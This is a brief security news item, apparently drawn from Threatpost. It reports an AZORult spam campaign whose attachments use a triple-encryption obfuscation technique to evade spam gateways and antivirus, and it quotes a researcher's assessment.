AZORult Campaign Adopts Novel Triple-Encryption Technique

2020-02-03 20:58

A recent wave of AZORult-laced spam caught the attention of researchers who warn that malicious attachments associated with the campaign are using a novel obfuscation technique, in an attempt to slip past spam gateways and avoid client-side antivirus detection.

AZORult is remote access trojan popular on Russian forums and most recently spotted last month in a spam campaign perpetrated by a hacker with an affinity toward singer-songwriter Drake.

The third level of encryption manifests itself in the link used by the dropper to download the final AZORult infostealer malware.

"The link to the remote file was protected with a third layer of encryption using the same algorithm we have seen in the PowerShell envelope," he wrote.

"My guess is that triple encryption might be a little bit more effective than most of the usual obfuscation techniques, since it is applied multiple times on multiple layers. Any sandboxing would defeat it as easily as most other obfuscation mechanisms, however it isn't a bad way to defeat signature and heuristics-based detection tools," Kopriva told Threatpost.

News URL

https://threatpost.com/azorult-campaign-encryption-technique/152508/

#encryption #azorult